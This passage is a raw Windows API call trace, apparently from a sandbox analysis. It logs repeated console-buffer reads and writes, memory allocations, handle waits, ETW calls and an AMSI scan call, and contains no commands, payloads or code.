[0352.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0352.042] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0352.043] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0352.045] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0352.049] GetConsoleOutputCP () returned 0x1b5 [0352.052] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.053] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0352.054] CoTaskMemFree (pv=0x1a8ad510) [0352.054] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x26bff7c*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x26bff7c*, lpNumberOfCharsWritten=0x1b62da58*=0x4b) returned 1 [0352.055] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0352.056] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0352.057] GetConsoleOutputCP () returned 0x1b5 [0352.057] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.057] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0352.058] CoTaskMemFree (pv=0x1a8ad510) [0352.058] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0352.059] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0352.059] GetConsoleOutputCP () returned 0x1b5 [0352.060] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.060] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0352.060] CoTaskMemFree (pv=0x1a8ad510) [0352.061] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0352.061] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0352.061] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0352.063] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0352.063] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0352.064] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0352.064] GetConsoleOutputCP () returned 0x1b5 [0352.064] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.065] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0352.065] CoTaskMemFree (pv=0x1a8ad510) [0352.065] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0352.066] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0352.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0352.067] GetConsoleOutputCP () returned 0x1b5 [0352.067] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.068] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0352.068] CoTaskMemFree (pv=0x1a8ad510) [0352.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0352.069] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0352.069] GetConsoleOutputCP () returned 0x1b5 [0352.070] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.070] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0352.071] CoTaskMemFree (pv=0x1a8ad510) [0352.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0352.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0352.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0352.072] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0352.072] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0352.073] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0352.073] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0352.074] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0352.074] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0352.075] GetConsoleOutputCP () returned 0x1b5 [0352.075] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.075] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0352.076] CoTaskMemFree (pv=0x1a8ad510) [0352.076] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x26c002c*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x26c002c*, lpNumberOfCharsWritten=0x1b62da58*=0x47) returned 1 [0352.077] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0352.077] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0352.079] GetConsoleOutputCP () returned 0x1b5 [0352.079] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.079] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0352.080] CoTaskMemFree (pv=0x1a8ad510) [0352.080] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0352.080] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0352.081] GetConsoleOutputCP () returned 0x1b5 [0352.081] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.081] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0352.082] CoTaskMemFree (pv=0x1a8ad510) [0352.082] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0352.083] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0352.083] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0352.084] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0352.084] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0352.084] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0352.085] GetConsoleOutputCP () returned 0x1b5 [0352.085] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.085] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0352.086] CoTaskMemFree (pv=0x1a8ad510) [0352.086] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0352.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0352.087] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0352.088] GetConsoleOutputCP () returned 0x1b5 [0352.088] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.088] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0352.089] CoTaskMemFree (pv=0x1a8ad510) [0352.089] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0352.090] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0352.090] GetConsoleOutputCP () returned 0x1b5 [0352.091] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.091] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0352.091] CoTaskMemFree (pv=0x1a8ad510) [0352.091] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0352.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0352.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0352.093] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0352.095] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0352.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0352.096] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0352.097] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0352.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0352.097] GetConsoleOutputCP () returned 0x1b5 [0352.098] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.098] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0352.099] CoTaskMemFree (pv=0x1a8ad510) [0352.099] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x26c0194*, nNumberOfCharsToWrite=0x77, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x26c0194*, lpNumberOfCharsWritten=0x1b62da58*=0x77) returned 1 [0352.100] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0352.100] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0352.101] GetConsoleOutputCP () returned 0x1b5 [0352.101] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.101] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0352.102] CoTaskMemFree (pv=0x1a8ad510) [0352.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0352.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0352.103] GetConsoleOutputCP () returned 0x1b5 [0352.103] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.103] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0352.104] CoTaskMemFree (pv=0x1a8ad510) [0352.104] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0352.105] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0352.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0352.106] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0352.106] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0352.107] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0352.107] GetConsoleOutputCP () returned 0x1b5 [0352.107] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.107] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0352.108] CoTaskMemFree (pv=0x1a8ad510) [0352.108] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0352.110] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0352.110] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0352.111] GetConsoleOutputCP () returned 0x1b5 [0352.111] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.111] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0352.112] CoTaskMemFree (pv=0x1a8ad510) [0352.112] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0352.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0352.113] GetConsoleOutputCP () returned 0x1b5 [0352.113] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.114] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0352.114] CoTaskMemFree (pv=0x1a8ad510) [0352.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0352.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0352.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0352.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0352.116] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0352.117] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0352.117] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0352.118] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0352.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0352.119] GetConsoleOutputCP () returned 0x1b5 [0352.119] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.119] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0352.120] CoTaskMemFree (pv=0x1a8ad510) [0352.120] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x26c030c*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x26c030c*, lpNumberOfCharsWritten=0x1b62da58*=0xf) returned 1 [0352.121] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0352.121] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0352.122] GetConsoleOutputCP () returned 0x1b5 [0352.122] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.122] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0352.123] CoTaskMemFree (pv=0x1a8ad510) [0352.125] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.126] CoTaskMemFree (pv=0x1a8ad510) [0352.129] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.130] CoTaskMemFree (pv=0x1a8ad510) [0352.130] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0352.132] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.133] CoTaskMemFree (pv=0x1a8ad510) [0352.134] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.135] CoTaskMemFree (pv=0x1a8ad510) [0352.139] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.141] CoTaskMemFree (pv=0x1a8ad510) [0352.142] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x26c00d4*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x26c00d4*, lpNumberOfCharsWritten=0x1b62da58*=0x41) returned 1 [0352.145] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.146] CoTaskMemFree (pv=0x1a8ad510) [0352.147] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.148] CoTaskMemFree (pv=0x1a8ad510) [0352.151] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.152] CoTaskMemFree (pv=0x1a8ad510) [0352.152] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0352.154] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.154] CoTaskMemFree (pv=0x1a8ad510) [0352.161] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.162] CoTaskMemFree (pv=0x1a8ad510) [0352.166] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.167] CoTaskMemFree (pv=0x1a8ad510) [0352.167] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x26c0174*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x26c0174*, lpNumberOfCharsWritten=0x1b62da58*=0x1) returned 1 [0352.169] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.169] CoTaskMemFree (pv=0x1a8ad510) [0352.171] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.173] CoTaskMemFree (pv=0x1a8ad510) [0352.176] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.177] CoTaskMemFree (pv=0x1a8ad510) [0352.177] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0352.179] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.179] CoTaskMemFree (pv=0x1a8ad510) [0352.181] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.182] CoTaskMemFree (pv=0x1a8ad510) [0352.184] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0352.185] CoTaskMemFree (pv=0x1a8ad510) [0352.185] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b62e140*=0x7cc, lpdwindex=0x1b62df24 | out: lpdwindex=0x1b62df24) returned 0x0 [0352.185] EtwEventActivityIdControl () returned 0x0 [0352.185] EtwEventActivityIdControl () returned 0x0 [0352.186] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b62e5c0*=0x7cc, lpdwindex=0x1b62e3a4 | out: lpdwindex=0x1b62e3a4) returned 0x0 [0352.186] CloseHandle (hObject=0x7cc) returned 1 [0352.186] EtwEventActivityIdControl () returned 0x0 [0352.186] EtwEventActivityIdControl () returned 0x0 [0352.186] EtwEventActivityIdControl () returned 0x0 [0352.187] EtwEventActivityIdControl () returned 0x0 [0352.187] EtwEventActivityIdControl () returned 0x0 [0352.187] EtwEventActivityIdControl () returned 0x0 [0352.188] EtwEventActivityIdControl () returned 0x0 [0352.188] EtwEventActivityIdControl () returned 0x0 [0352.188] SetEvent (hEvent=0x6f4) returned 1 [0352.189] SetEvent (hEvent=0x708) returned 1 [0352.192] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b62f0a0*=0x710, lpdwindex=0x1b62ee84 | out: lpdwindex=0x1b62ee84) returned 0x0 [0352.192] SetThreadUILanguage (LangId=0x0) returned 0x409 [0352.193] CoCreateGuid (in: pguid=0x1b62ef98 | out: pguid=0x1b62ef98*(Data1=0xe41ed5b2, Data2=0xf217, Data3=0x4e61, Data4=([0]=0x94, [1]=0xf2, [2]=0xc5, [3]=0x64, [4]=0xfa, [5]=0x7c, [6]=0xb4, [7]=0xe2))) returned 0x0 [0352.193] AmsiOpenSession () returned 0x0 [0352.193] AmsiScanBuffer () returned 0x80070015 [0352.196] EtwEventActivityIdControl () returned 0x0 [0352.196] EtwEventActivityIdControl () returned 0x0 [0352.196] EtwEventActivityIdControl () returned 0x0 [0352.197] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x1b62e6f0*=0x60c, lpdwindex=0x1b62e4e4 | out: lpdwindex=0x1b62e4e4) returned 0x0 [0352.198] SetEvent (hEvent=0x620) returned 1 [0352.198] EtwEventActivityIdControl () returned 0x0 [0352.198] SetEvent (hEvent=0x630) returned 1 [0352.220] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b62f0a0*=0x710, lpdwindex=0x1b62ee84 | out: lpdwindex=0x1b62ee84) returned 0x0 [0352.261] CoGetContextToken (in: pToken=0x1b62f930 | 